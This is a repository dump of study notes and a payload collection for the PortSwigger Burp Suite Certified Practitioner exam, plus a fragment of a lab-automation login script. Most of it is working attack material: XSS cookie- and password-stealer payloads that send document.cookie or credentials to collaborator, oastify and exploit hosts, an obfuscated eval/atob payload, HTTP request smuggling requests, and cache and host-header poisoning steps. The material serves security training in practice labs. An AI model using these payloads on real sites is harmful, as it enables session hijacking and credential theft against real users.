35 |             data = {
36 |                 "csrf": csrf_token,
37 |                 "username": username,
38 |                 "password": password,
39 |             }
40 |             log.info("Attempt login bypass")
41 |             if self.no_proxy:    #    provide option to set proxy or run script with no proxy
42 |                 resp = self.session.post(self.login_url, data=data)
43 |             else:
44 |                 resp = self.session.post(
45 |                     self.login_url, data=data, proxies=utils.PROXIES, verify=False
46 |                 )
47 |             if resp.status_code == 200:
48 |                 log.info("Successfully bypassed login!")
49 | 


--------------------------------------------------------------------------------
/payloads/CookieStealer-Payloads.md:
--------------------------------------------------------------------------------
  1 | 
  2 | # CookieStealer-Payloads  
  3 | 
  4 | >Cookie Stealer payloads using Javascript
  5 | 
  6 | ```Javascript
  7 | JavaScript:document.location='https://COLLABORATOR.com?c='+document.cookie
  8 | ```  
  9 | 
 10 | >Reflected XSS into HTML context with nothing encoded in search.  
 11 | 
 12 | ```JavaScript
 13 | <script>document.location='https://COLLABORATOR.com?c='+document.cookie</script>
 14 | ```  
 15 | 
 16 | >Reflected DOM XSS, into JSON data that is processed by **eval().**  
 17 | 
 18 | ```JavaScript
 19 | \"-fetch('https://Collaborator.com?cs='+btoa(document.cookie))}//
 20 | ```  
 21 | 
 22 | >JavaScript Template literals are enclosed by backtick ( \` ) characters instead of double or single quotes.  
 23 | 
 24 | ```JavaScript
 25 | ${document.location='https://tvsw9dim0doynnpscx9mgtq67xdo1jp8.oastify.com/?cookies='+document.cookie;}
 26 | ```  
 27 | 
 28 | ![javascript-template-string.png](../images/javascript-template-string.png)  
 29 | 
 30 | >More Cross-Site Scripting (XSS) example cookie stealer payloads.  
 31 | 
 32 | ```Javascript
 33 | <script>
 34 | document.location='https://Collaborator.com/?cookiestealer='+document.cookie;
 35 | </script>
 36 | ```
 37 | 
 38 | ```Javascript
 39 | a"/><script>document.location='https://bc.oastify.com/cookiestealer.php?c='+document.cookie;</script>
 40 | ```
 41 | 
 42 | ```Javascript
 43 | document.location='https://burp-collab.x.com/cookiestealer.php?c='+document.cookie;
 44 | ```
 45 | 
 46 | ```Javascript
 47 | document.location='https://BurpCollaBoRaTor.oastify.com/?FreeCookies='+document.cookie;
 48 | ```
 49 | 
 50 | ```Javascript
 51 | /?evil='/><script>document.write('<img src="https://exploit.com/steal.MY?cookie=' document.cookie '" />')</script> 
 52 | ```
 53 | 
 54 | ```Javascript
 55 | GET /js/geolocate.js?callback=setCountryCookie&utm_content=foo;callback=document.location='http://BURPCOL.oastify.com/?StealCookies=' document.cookie ;//
 56 | ```
 57 | 
 58 | ```Javascript
 59 | <img src=x onerror=this.src=//exploit.net/?'+document.cookie;>
 60 | ```
 61 | 
 62 | ```Javascript
 63 | <script>
 64 |     document.location=""http://stock.lab.web-security-academy.net/?productId=4
 65 |             <script>
 66 |                     var req = new XMLHttpRequest(); 
 67 |                     req.onload = reqListener; 
 68 |                     req.open('get','https://lab.web-security-academy.net/accountDetails',true); 
 69 |                     req.withCredentials = true;
 70 |                     req.send();
 71 |                     function reqListener() {
 72 |                             location='https://exploit.web-security-academy.net/log?key='%2bthis.responseText;
 73 |                     };
 74 |             %3c/script>
 75 |             &storeId=1""
 76 | </script>
 77 | ```
 78 | 
 79 | ```Javascript
 80 | <script>
 81 | fetch(‘https://burpcollaborator.net’, {method: ‘POST’,mode: ‘no-cors’,body:document.cookie});
 82 | </script>
 83 | ```
 84 | 
 85 | ```Javascript
 86 | <script>
 87 |   fetch('https://COLLABORATOR.com', {
 88 |   method: 'POST',
 89 |   mode: 'no-cors',
 90 |   body:'PeanutButterCookies='+document.cookie
 91 |   }); 
 92 | </script>   
 93 | ```
 94 | 
 95 | ```Javascript
 96 | x"); var fuzzer=new Image;fuzzer.src="https://COLLABORATOR.com/?"+document.cookie; //
 97 | ```
 98 | 
 99 | ```Javascript
100 | <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>  
101 | ```
102 | 
103 | ```Javascript
104 | <script>new Image().src="http://Collaborator.COM/cool.jpg?output="+document.cookie;</script>
105 | ```
106 | 
107 | ```Javascript
108 | ?productId=1&storeId="></select><img src=x onerror=this.src='http://exploit.bad/?'+document.cookie;>
109 | ```
110 | 
111 | ```Javascript
112 | <script>
113 | document.write('<img src="http://exploit.net?cookieStealer='+document.cookie+'" />');
114 | </script>
115 | ```
116 | 
117 | ```Javascript
118 | <img src=x onerror=this.src='http://exploit.bad/?'+document.cookie;>
119 | ```
120 | 
121 | ```Javascript
122 | <script>
123 | fetch('https://BURP-COLLABORATOR', {
124 | method: 'POST',
125 | mode: 'no-cors',
126 | body:document.cookie
127 | });
128 | </script>
129 | ```
130 | 
131 | >::::  Steal Password / Cookie Stealer ::::
132 | 
133 | >XMLHttpRequest
134 | 
135 | ```html
136 | <input name=username id=username>
137 | <input type=password name=password id=password onhcange="CaptureFunction()">
138 | <script>
139 | function CaptureFunction()
140 | {
141 | var user = document.getElementById('username').value;
142 | var pass = document.getElementById('password').value;
143 | var xhr = new XMLHttpRequest();
144 | xhr.open("GET", "https://exploit.com/?username=" + user + "&password=" + pass, true);
145 | xhr.send();
146 | }
147 | </script>
148 | ```
149 | 
150 | >FETCH API
151 | 
152 | ```Javascript
153 | <input name=username id=username>
154 | <input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
155 | method:'POST',
156 | mode: 'no-cors',
157 | body:username.value+':'+this.value
158 | });">
159 | ```
160 | 
161 | 
162 | >::::  DATA EXFILTRATION  /  COOKIE STEALER  ::::
163 | ```Javascript
164 |   </textarea><script>fetch('http://exploit.evil?cookie=' + btoa(document.cookie) );</script> 
165 | ```
166 | 
167 | ```Javascript
168 | <script>document.write('<img src="http://evil.net/submitcookie.php?cookie=' + escape(document.cookie) + '" />');</script>
169 | ```
170 | 
171 | ```Javascript
172 | <script>
173 | document.write('<img src="HTTPS://EXPLOIT.net/?c='+document.cookie+'" />');
174 | </script>
175 | ```
176 | 
177 | ```Javascript
178 | <script>document.write('<img src="https://EXPLOIT.net/?c='%2bdocument.cookie%2b'" />');</script>
179 | ```  
180 | 
181 | >IFRAMEs
182 | 
183 | ```JavaScript
184 | <iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({
185 |     "type": "load-channel",
186 |     "url": "JavaScript:document.location='https://COLLABORATOR.com?c='+document.cookie"
187 | }), "*");'>
188 | ```  
189 | 
190 | >Javascript set test cookie in current browser session with no HttpOnly flag to allow proof of concept cookie stealer.  
191 | 
192 | ```
193 | document.cookie = "TopSecretCookie=HackThePlanetWithPeanutButter";
194 | ```
195 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
   1 | 
   2 | # Burp-Suite-Certified-Practitioner-Exam-Study  
   3 | 
   4 | >My study notes on the PortSwigger Academy [Burp Suite Certified Practitioner](https://portswigger.net/web-security/certification) (BSCP) Exam topics. The below BSCP notes may require going to PortSwigger Academy labs to understand my thinking in changing payloads to get require results needed to progress to next stage in exam.  
   5 | 
   6 | **[Foothold](#foothold)**  
   7 | [Dom-XSS](#dom-xss-messages)  
   8 | [Web Cache Poison](#web-cache-poison)  
   9 | [Cross Site Scripting](#cross-site-scripting)  
  10 | [Host Header Poison](#host-header-poison---forgot-password)  
  11 | [HTTP Request Smuggling](#http-request-smuggling)  
  12 |   
  13 | **[Privilege Escalation](#privilege-escalation)**  
  14 | [JSON roleid PrivEsc](#privesc-json-roleid)  
  15 | [Password refresh CSRF](#password-refresh-csrf)  
  16 | [Brute force auth cookie](#brute-force-authentication)  
  17 |   
  18 | **[Data Exfiltration](#data-exfiltration)**  
  19 | [SQLi Data Exfil](#sql-injection)  
  20 | [XML entities & Injections](#xxe-injections)  
  21 | [SSRF Server side request forgery](#ssrf---server-side-request-forgery)  
  22 | [SSTI Server side template injection](#ssti---server-side-template-injection)  
  23 | [Prototype pollution](#prototype-pollution)  
  24 | [JSON Web Tokens](#jwt)  
  25 | [Cross Site Request Forgery](#csrf)  
  26 | [File path traversal](#file-path-traversal)  
  27 |   
  28 | [Payloads](payloads/README.md)  
  29 | [Lab Automated Python Scripts](python/README.md)  
  30 |   
  31 | [Focus target scanning](#focus-scanning)  
  32 | [Youtube Study Playlist](#youtube-training-playlist)  
  33 | 
  34 | # Foothold  
  35 | 
  36 | 
  37 | ## DOM XSS Messages  
  38 | 
  39 | >Target use web messaging and parses the message as JSON. Exploiting the vulnerability by constructing an HTML page on the exploit server that exploits DOM XSS vulnerability and steal victim cookie.  
  40 | 
  41 | >The vulnerable JavaScript code on the target using event listener that listens for a web message. This event listener expects a **string** that is parsed using **JSON.parse()**. In the JavaScript below, we can see that the event listener expects a **type** property and that the **load-channel** case of the **switch** statement changes the **img src** attribute.  
  42 | 
  43 | ```JavaScript
  44 | <script>
  45 | 	window.addEventListener('message', function(e) {
  46 | 		var img = document.createElement('img'), ACMEplayer = {element: img}, d;
  47 | 		document.body.appendChild(img);
  48 | 		try {
  49 | 			d = JSON.parse(e.data);
  50 | 		} catch(e) {
  51 | 			return;
  52 | 		}
  53 | 		switch(d.type) {
  54 | 			case "page-load":
  55 | 				ACMEplayer.element.scrollIntoView();
  56 | 				break;
  57 | 			case "load-channel":
  58 | 				ACMEplayer.element.src = d.url;
  59 | 				break;
  60 | 			case "player-height-changed":
  61 | 				ACMEplayer.element.style.width = d.width + "px";
  62 | 				ACMEplayer.element.style.height = d.height + "px";
  63 | 				break;
  64 | 			case "redirect":
  65 | 				window.location.replace(d.redirectUrl);
  66 | 				break;
  67 | 		}
  68 | 	}, false);
  69 | </script>
  70 | ```  
  71 | 
  72 | >To exploit the above code, inject JavaScript into the JSON data to change "load-channel" field data and steal document cookie.  
  73 | 
  74 |   
  75 | >Hosted **iframe** on exploit server html body, to send the victim cookie to the collaboration server.  
  76 | 
  77 | ```html
  78 | <iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({
  79 |     "type": "load-channel",
  80 |     "url": "JavaScript:document.location='https://COLLABORATOR.com?c='+document.cookie"
  81 | }), "*");'>
  82 | 
  83 | ```  
  84 | 
  85 | [PortSwigger Lab: DOM XSS using web messages and JSON.parse](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-json-parse)  
  86 | 
  87 | ### DOM XSS Exploitation JSON.parse web messages  
  88 | 
  89 | >Identify web messages on target that is using **postmessage()** with **DOM Invader**.  
  90 | 
  91 | ![DOM Invader identify web messages](images/dom-invader-identify-web-messages.png)  
  92 | 
  93 | >Replay the post message using DOM Invader after altering the JSON data.  
  94 | 
  95 | ```JSON
  96 | {
  97 |     "type": "load-channel",
  98 |     "url": "JavaScript:document.location='https://COLLABORATOR.com?c='+document.cookie"
  99 | }
 100 | ```  
 101 | 
 102 | ![DOM Invader resend web messages](images/dom-invader-resend-web-messages.png)  
 103 |   
 104 | [PortSwigger: Identify DOM XSS using PortSwigger DOM Invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/web-messages)  
 105 | 
 106 | 
 107 | ## Web Cache Poison  
 108 | 
 109 | >Target use **tracking.js** JavaScript, and is vulnerable to **X-Forwarded-Host** header redirecting path, allowing the stealing of cookie by poisoning cache.
 110 | 
 111 | ```html
 112 | GET / HTTP/1.1
 113 | Host: TARGET.web-security-academy.net
 114 | X-Forwarded-Host: exploit-SERVER.exploit-server.net
 115 | 
 116 | ```  
 117 | 
 118 | ![tracking.js](images/tracking.js.png)  
 119 | 
 120 | >Hosting on the exploit server, injecting the **X-Forwarded-Host** header in request, and poison the cache until victim hits poison cache.  
 121 | 
 122 | ```
 123 |  /resources/js/tracking.js 
 124 | ```  
 125 |   
 126 | ![exploit host tracking.js](images/exploit-host-tracking-js.png)  
 127 |   
 128 | ```javascript
 129 | document.location='https://exploit.exploit-server.net/cookies?c='+document.cookie;
 130 | ```  
 131 | 
 132 | >Keep **Poisoning** the web cache of target by resending request with **X-Forwarded-Host** header.  
 133 | 
 134 | ![x-cache-hit.png](images/x-cache-hit.png)  
 135 | 
 136 | [PortSwigger Lab: Web cache poisoning with an unkeyed header](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-with-an-unkeyed-header)  
 137 | 
 138 | [Param Miner Extension to identify web cache vulnerabilities](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943)  
 139 | 
 140 | ## Cross Site Scripting
 141 | 
 142 | >XSS Resources pages to lookup payloads for **tags** and **events**.   
 143 | 
 144 | + [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
 145 | + [PayloadsAllTheThings (XSS)](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#xss-in-htmlapplications)  
 146 | 
 147 | >CSP Evaluator tool to check if content security policy is in place to mitigate XSS attacks.
 148 | 
 149 | + [CSP Evaluator](https://csp-evaluator.withgoogle.com/)  
 150 |   
 151 | >Set a test unsecure cookie in browser dev tools to do POC XSS cookie stealer.  
 152 | 
 153 | ```JavaScript
 154 | document.cookie = "TopSecret=UnSafeCookieSessionValueForTopSecretCookie";
 155 | ```
 156 |   
 157 | ### XSS Tags & Events  
 158 | 
 159 | >This section give guide to identify reflected XSS in a **search** function on a target and how to determine the HTML tags and events attributes not blocked.  
 160 |   
 161 | >The tag **Body** and event **onresize** is only the only allowed on target making it vulnerable to XSS.  
 162 | 
 163 | ```JavaScript
 164 | ?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
 165 | ```  
 166 | 
 167 | >Body and event **'onpopstate'** is only allowed.  
 168 |   
 169 | ```JavaScript
 170 | ?search=%22%3E%3Cbody%20onpopstate=print()>
 171 | ```  
 172 | 
 173 | [PortSwigger Cheat-sheet XSS Example: onpopstate event](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#onpopstate)  
 174 | 
 175 | >Below JavaScript is hosted on exploit server and then deliver to victim. It is iframe doing onload and the search parameter is vulnerable to **onpopstate**.  
 176 | 
 177 | ```JavaScript
 178 | <iframe onload="if(!window.flag){this.contentWindow.location='https://TARGET.net?search=<body onpopstate=document.location=`http://COLLABORATOR.com/?`+document.cookie>#';flag=1}" src="https://TARGET.net?search=<body onpopstate=document.location=`http://COLLABORATOR.com/?`+document.cookie>"></iframe>
 179 | ```  
 180 | 
 181 | >Following iframe uses **hash** character to trigger the OnHashChange **'#'** XSS.  
 182 |   
 183 | ```JavaScript
 184 | <iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
 185 | ```  
 186 | 
 187 | [Crypto-Cat: DOM XSS in jQuery selector sink using a hashchange event](https://github.com/Crypto-Cat/CTF/blob/main/web/WebSecurityAcademy/xss/dom_xss_jquery_hashchange/writeup.md)  
 188 | 
 189 | ### Methodology to identify allowed XSS Tags  
 190 | 
 191 | >The below lab gives great **Methodology** to identify allowed HTML tags and events for crafting POC XSS.  
 192 | 
 193 | [PortSwigger Lab: Reflected XSS into HTML context with most tags and attributes blocked](https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-tags-and-attributes-blocked)  
 194 |   
 195 | >Host **iframe** code on exploit server and deliver exploit link to victim.  
 196 | 
 197 | ```html
 198 | <iframe src="https://TARGET.web.net/?search=%22%3E%3Cbody%20onpopstate=print()%3E">  
 199 | ```  
 200 | 
 201 | ### Reflected XSS (Cookie Stealers)  
 202 | 
 203 | >In the **Search** function a Reflected XSS vulnerability is identified. The attacker then deliver an exploit link to victim with cookie stealing payload in a hosted **iframe** on their exploit server.  
 204 | 
 205 | >The search JavaScript code on the target is using the data in JSON reflected response, that is then send to **eval()** function, and not sanitizing **\\** escape proper user input.  Backslash is not escaped correct and when the JSON response attempts to escape the opening double-quotes character, it adds a second backslash. The resulting double-backslash causes the escaping to be effectively canceled out.  
 206 | 
 207 | ```JavaScript
 208 | \"-fetch('https://Collaborator.com?cs='+btoa(document.cookie))}//
 209 | ```  
 210 | 
 211 | >Image show the request using search function to send the document.cookie value in base64 to collaboration server.  
 212 | 
 213 | ![Reflected dom-xss json cookie stealer](images/reflected-dom-xss-json-cookie-stealer.png)  
 214 | 
 215 | [PortSwigger Lab: Reflected DOM XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-dom-xss-reflected)  
 216 | 
 217 | >WAF is preventing dangerous search filters and tags, then bypass XSS filters using JavaScript global variables.  
 218 | 
 219 | ```JavaScript
 220 | "-alert(window["document"]["cookie"])-"
 221 | "-window["alert"](window["document"]["cookie"])-"
 222 | "-self["alert"](self["document"]["cookie"])-"
 223 | ```  
 224 | 
 225 | [secjuice: Bypass XSS filters using JavaScript global variables](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/)  
 226 |   
 227 | ```JavaScript
 228 | fetch("https://Collaborator.oastify.com/?c=" + btoa(document['cookie']))
 229 | ```
 230 | >Base64 encode the payload.  
 231 | 
 232 | ```
 233 | ZmV0Y2goImh0dHBzOi8vODM5Y2t0dTd1b2dlZG02YTFranV5M291dGx6Y24yYnIub2FzdGlmeS5jb20vP2M9IiArIGJ0b2EoZG9jdW1lbnRbJ2Nvb2tpZSddKSk=
 234 | ```  
 235 | 
 236 | >Test payload on our own session in Search.  
 237 | 
 238 | ```JavaScript
 239 | "+eval(atob("ZmV0Y2goImh0dHBzOi8vODM5Y2t0dTd1b2dlZG02YTFranV5M291dGx6Y24yYnIub2FzdGlmeS5jb20vP2M9IiArIGJ0b2EoZG9jdW1lbnRbJ2Nvb2tpZSddKSk="))}//
 240 | ```  
 241 | 
 242 | + Using the **eval()** method evaluates or executes an argument. 
 243 | + Using **atob()** or **btoa()** is function used for encoding to and from base64 formated strings.
 244 | + If **eval()** being blocked then Alternatives:
 245 |   + setTimeout("code")
 246 |   + setInterval("code)
 247 |   + setImmediate("code")
 248 |   + Function("code")()
 249 |   
 250 | >The image below shows Burp Collaborator receiving the victim cookie as a base64 result.  
 251 | 
 252 | ![Burp collaborator receiving request with base64 cookie value from our POC.](images/xss2.png)  
 253 | 
 254 | >Hosting the **IFRAME** with eval() and fetch() payload on exploit server, respectively base64 encoded and URL encoded.  
 255 | 
 256 | ```html
 257 | <iframe src="https://TARGET.web-security-academy.net/?SearchTerm=%22%2b%65%76%61%6c%28%61%74%6f%62%28%22%5a%6d%56%30%59%32%67%6f%49%6d%68%30%64%48%42%7a%4f%69%38%76%4f%44%4d%35%59%32%74%30%64%54%64%31%62%32%64%6c%5a%47%30%32%59%54%46%72%61%6e%56%35%4d%32%39%31%64%47%78%36%59%32%34%79%59%6e%49%75%62%32%46%7a%64%47%6c%6d%65%53%35%6a%62%32%30%76%50%32%4d%39%49%69%41%72%49%47%4a%30%62%32%45%6f%5a%47%39%6a%64%57%31%6c%62%6e%52%62%4a%32%4e%76%62%32%74%70%5a%53%64%64%4b%53%6b%3d%22%29%29%7d%2f%2f"/>
 258 | ```
 259 | ![(Deliver reflected xss to steal victim cookie.](images/xss1.png)  
 260 | 
 261 | >Decode above payload from url encoding, is the following:  
 262 | 
 263 | ```html
 264 | https://TARGET.web-security-academy.net/?SearchTerm="+eval(atob("ZmV0Y2goImh0dHBzOi8vODM5Y2t0dTd1b2dlZG02YTFranV5M291dGx6Y24yYnIub2FzdGlmeS5jb20vP2M9IiArIGJ0b2EoZG9jdW1lbnRbJ2Nvb2tpZSddKSk="))}//  
 265 | ```  
 266 | 
 267 | >Decode part of payload above that is base64 encoded to the following:  
 268 | 
 269 | ```html
 270 | https://TARGET.web-security-academy.net/?SearchTerm="+eval(atob("fetch("https://839cktu7uogedm6a1kjuy3outlzcn2br.oastify.com/?c=" + btoa(document['cookie']))"))}//  
 271 | ```  
 272 |   
 273 | #### URL & Base64 encoders and decoders  
 274 | 
 275 | [URL Decode and Encode](https://www.urldecoder.org/)  
 276 | [BASE64 Decode and Encode](https://www.base64encode.org/)    
 277 |   
 278 | ### Stored XSS
 279 | 
 280 | >Cross site Scriting saved in Blog post comment. This Cookie Stealer payload then send the victim session cookie to the exploit server logs.  
 281 | 
 282 | ```html
 283 | <img src="1" onerror="window.location='http://exploit.net/cookie='+document.cookie">
 284 | ```  
 285 | 
 286 | >Product and Store lookup  
 287 | 
 288 | ```html
 289 | ?productId=1&storeId="></select><img src=x onerror=this.src='http://exploit.net/?'+document.cookie;>
 290 | ```  
 291 | 
 292 | >Stored XSS Blog post  
 293 | 
 294 | ```JavaScript
 295 | <script>
 296 | document.write('<img src="http://exploit.net?cookieStealer='+document.cookie+'" />');
 297 | </script>
 298 | ```  
 299 | 
 300 | ![Stored XSS Blog post](images/stored-xss-blog-post.png)  
 301 | 
 302 | >**Fetch API** JavaScript Cookie Stealer payload in Blog post comment.  
 303 | 
 304 | ```JavaScript
 305 | <script>
 306 | fetch('https://exploit.net', {
 307 | method: 'POST',
 308 | mode: 'no-cors',
 309 | body:document.cookie
 310 | });
 311 | </script>
 312 | ```  
 313 | 
 314 | [PortSwigger Lab: Exploiting cross-site scripting to steal cookies](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies)  
 315 | 
 316 | ### DOM-Based XSS  
 317 | 
 318 | >DOM-based XSS vulnerabilities arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes code to a sink that supports dynamic code execution. In the target source code look out for the following:  
 319 | 
 320 | * ng-app
 321 | * URLSearchParams
 322 | * eval()
 323 | * replace()
 324 | * innerHTML
 325 | * JSON.parse
 326 | * document.write
 327 | * location.search
 328 | * addEventListener  
 329 |   
 330 | >AngularJS expression in the search box when angle brackets and double quotes HTML-encoded.  
 331 | 
 332 | ```JavaScript
 333 | {{$on.constructor('alert(1)')()}}
 334 | ```  
 335 | 
 336 | ![domxss-on-constructor.png](images/domxss-on-constructor.png)  
 337 | 
 338 | [PortSwigger Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)  
 339 | 
 340 | >Below the target is vulnerable to dom-xss in the stock check function. Document.write is the sink used with location.search allowing us to add new value to Javascript variable **storeId**.  
 341 | 
 342 | ```html
 343 | /product?productId=1&storeId="></select><img%20src=1%20onerror=alert(document.cookie)>  
 344 | ```  
 345 | 
 346 | ![get-dom-xss.png](images/get-dom-xss.png)  
 347 | 
 348 | >Dom-based XSS request with inserted malicious code into the variable read by the target JavaScript.  
 349 | 
 350 | ![dom-xss](images/dom-xss.png)  
 351 | 
 352 | [PortSwigger Lab: DOM XSS in document.write sink using source location.search inside a select element](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink-inside-select-element)  
 353 | 
 354 | #### Dom Invader  
 355 | 
 356 | >Using Dom Invader plugin and set the canary to value, such as 'domxss' and detect DOM-XSS sinks that can be exploit.  
 357 | 
 358 | ![DOM Invader](images/dom-invader.png)  
 359 | 
 360 | ## Host Header Poison - forgot-password
 361 | 
 362 | ### Spoof IP Address  
 363 | 
 364 | >Identify that altered HOST headers are supported, which allows you to spoof your IP address and bypass the IP-based brute-force protection or redirection attacks to do password reset poisoning.  
 365 |   
 366 | >Change the username parameter to carlos and send the request.  
 367 | 
 368 | ```html
 369 | X-Forwarded-Host: EXPLOIT-SERVER-ID.exploit-server.net
 370 | X-Host: EXPLOIT-SERVER-ID.exploit-server.net
 371 | X-Forwarded-Server: EXPLOIT-SERVER-ID.exploit-server.net
 372 | ```  
 373 | 
 374 | >Check the exploit server log to obtain the reset link to the victim username.  
 375 |   
 376 | ![Exploit Server Logs capture the forgot password reset token](images/HOST-Header-forgot-password-reset.PNG)  
 377 | 
 378 | [PortSwigger Lab: Password reset poisoning via middleware](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware)  
 379 | 
 380 | ### HOST Connection State  
 381 | 
 382 | >Target is vulnerable to routing-based SSRF via the Host header. Sending grouped request in sequence using **single connection** and setting the connection header to **keep-alive**, bypass host header validation and enable SSRF exploit of local server.  
 383 | 
 384 | ```html
 385 | GET /intranet/service HTTP/1.1
 386 | Host: TARGET.web-security-academy.net
 387 | Cookie: session=vXAA9EM1hzQuJwHftcLHKxyZKtSf2xCW
 388 | Content-Length: 48
 389 | Content-Type: text/plain;charset=UTF-8
 390 | Connection: keep-alive
 391 | ```  
 392 | 
 393 | >Next request is the second tab in group sequence of requests.  
 394 | 
 395 | ```html
 396 | POST /service/intranet HTTP/1.1
 397 | Host: localhost
 398 | Cookie: _lab=YOUR-LAB-COOKIE; session=YOUR-SESSION-COOKIE
 399 | Content-Type: x-www-form-urlencoded
 400 | Content-Length: 53
 401 | 
 402 | csrf=YOUR-CSRF-TOKEN&username=carlos
 403 | ```  
 404 | 
 405 | >Observe that the second request has successfully accessed the admin panel.  
 406 | 
 407 | ![single connection](images/single-connection.png)  
 408 | 
 409 | [PortSwigger Lab: Host validation bypass via connection state attack](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-host-validation-bypass-via-connection-state-attack)  
 410 | 
 411 | 
 412 | ## HTTP Request Smuggling  
 413 | 
 414 | >Architecture with front-end and back-end server, and front-end or backend does not support chunked encoding **(HEX)** or content-length **(Decimal)**. Bypass security controls to retrieve the victim's request and use the victim user's cookies to access their account.  
 415 | 
 416 | ### TE.CL multiCase - Transfer-Encoding
 417 |   
 418 | >Manually fixing the length fields in request smuggling attacks, requires each chunk size in bytes expressed in **HEXADECIMAL**, and **Content-Length** specifies the length of the message body in **bytes**. Chunks are followed by a **newline**, then followed by the chunk contents. The message is terminated with a chunk of size ZERO.  
 419 | 
 420 | ![TE-CL-http-request-smuggle.png](images/TE-CL-http-request-smuggle.png)  
 421 | 
 422 | >**Note:** In certain smuggle vulnerabilities, go to Repeater menu and ensure the **"Update Content-Length"** option is unchecked.  
 423 | 
 424 | ```
 425 | POST / HTTP/1.1
 426 | Host: TARGET.web-security-academy.net
 427 | Content-length: 4
 428 | Transfer-Encoding: chunked
 429 | 
 430 | 71
 431 | GET /admin HTTP/1.1
 432 | Host: localhost
 433 | Content-Type: application/x-www-form-urlencoded
 434 | Content-Length: 15
 435 | 
 436 | x=1
 437 | 0  
 438 |   
 439 | ```  
 440 | 
 441 | >**Note:** include the trailing sequence \r\n\r\n following the final 0.  
 442 | 
 443 | >Calculating TE.CL (Transfer-Encoding / Content-Length) smuggle request length in **HEXADECIMAL** and the payload is between the hex length of **71** and the terminating **ZERO**, not including the ZERO AND not the preceding \r\n on line above ZERO, as part of length. The inital POST request **content-length** is manually set.  
 444 |   
 445 | [PortSwigger Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability](https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-te-cl)  
 446 | 
 447 | 
 448 | ### CL.TE multiCase - Content-Length
 449 | 
 450 | >Large Content-Length to capture victim requests. Sending a POST request with smuggled request but the content length is longer than the real length and when victim browse their cookie session value is posted to blob comment. Increased the comment-post request's Content-Length to **798**, then smuggle POST request to the back-end server.
 451 | 
 452 | ```html
 453 | POST / HTTP/1.1
 454 | Host: TARGET.web-security-academy.net
 455 | Content-Type: application/x-www-form-urlencoded
 456 | Content-Length: 242
 457 | Transfer-Encoding: chunked
 458 | 
 459 | 0
 460 | 
 461 | POST /post/comment HTTP/1.1
 462 | Content-Type: application/x-www-form-urlencoded
 463 | Content-Length: 798
 464 | Cookie: session=HackerCurrentCookieValue
 465 | 
 466 | csrf=ValidCSRFCookieValue&postId=8&name=c&email=c%40c.c&website=&comment=c
 467 | ```  
 468 |   
 469 | ![Exploiting HTTP request smuggling with content-length value](images/content-length-capture-victim-request.png)  
 470 | 
 471 | >No new line at end of the smuggled POST request above^^.  
 472 | 
 473 | >View the blog **post** to see if there's a comment containing a user's request. Note that once the victim user browses the target website, then only will the attack be successful. Copy the user's Cookie header from the blog post comment, and use the cookie to access victim's account.  
 474 |   
 475 | ![Exploiting HTTP request smuggling to capture other users' requests](images/victim-request-captured-blog-comment.png)  
 476 | 
 477 | [PortSwigger Lab: Exploiting HTTP request smuggling to capture other users' requests](https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests)  
 478 | 
 479 | 
 480 | ### CL.TE multiCase - User-Agent Cookie Stealer
 481 | 
 482 | >Identify the UserAgent value is stored in the GET request loading the blog comment form, and stored in **User-Agent** hidden value. Exploiting HTTP request smuggling to deliver reflected XSS using **User-Agent** value that is then placed in a smuggled request.  
 483 | 
 484 | >Basic Cross Site Scripting Payload escaping out of HTML document.  
 485 | 
 486 | ```JavaScript
 487 |  "/><script>alert(1)</script>
 488 | ```
 489 | 
 490 | >COOKIE STEALER Payload.  
 491 | 
 492 | ```JavaScript
 493 | a"/><script>document.location='http://Collaborator.com/?cookiestealer='+document.cookie;</script>
 494 | ```  
 495 | 
 496 | >Smuggle this XSS request to the back-end server, so that it exploits the next visitor. Place the XSS cookie stealer in **User-Agent** header.  
 497 | 
 498 | ```html
 499 | POST / HTTP/1.1
 500 | Host: TARGET.websecurity.net
 501 | Content-Length: 237
 502 | Content-Type: application/x-www-form-urlencoded
 503 | Transfer-Encoding: chunked
 504 | 
 505 | 0
 506 | 
 507 | GET /post?postId=4 HTTP/1.1
 508 | User-Agent: a"/><script>document.location='http://COLLABORATOR.com/?Hack='+document.cookie;</script>
 509 | Content-Type: application/x-www-form-urlencoded
 510 | Content-Length: 5
 511 | 
 512 | x=1
 513 | ```  
 514 | 
 515 | ![HTTP request smuggling to deliver reflected XSS and steal victim cookie](images/user-agent-cookie-stealer-smuggled.PNG)  
 516 | 
 517 | >Check the PortSwigger Collaborator Request received from victim browsing target.  
 518 |   
 519 | ![Collaborator capture xss Request from victim browsing target](images/collaborator-xss-Request-received.png)  
 520 | 
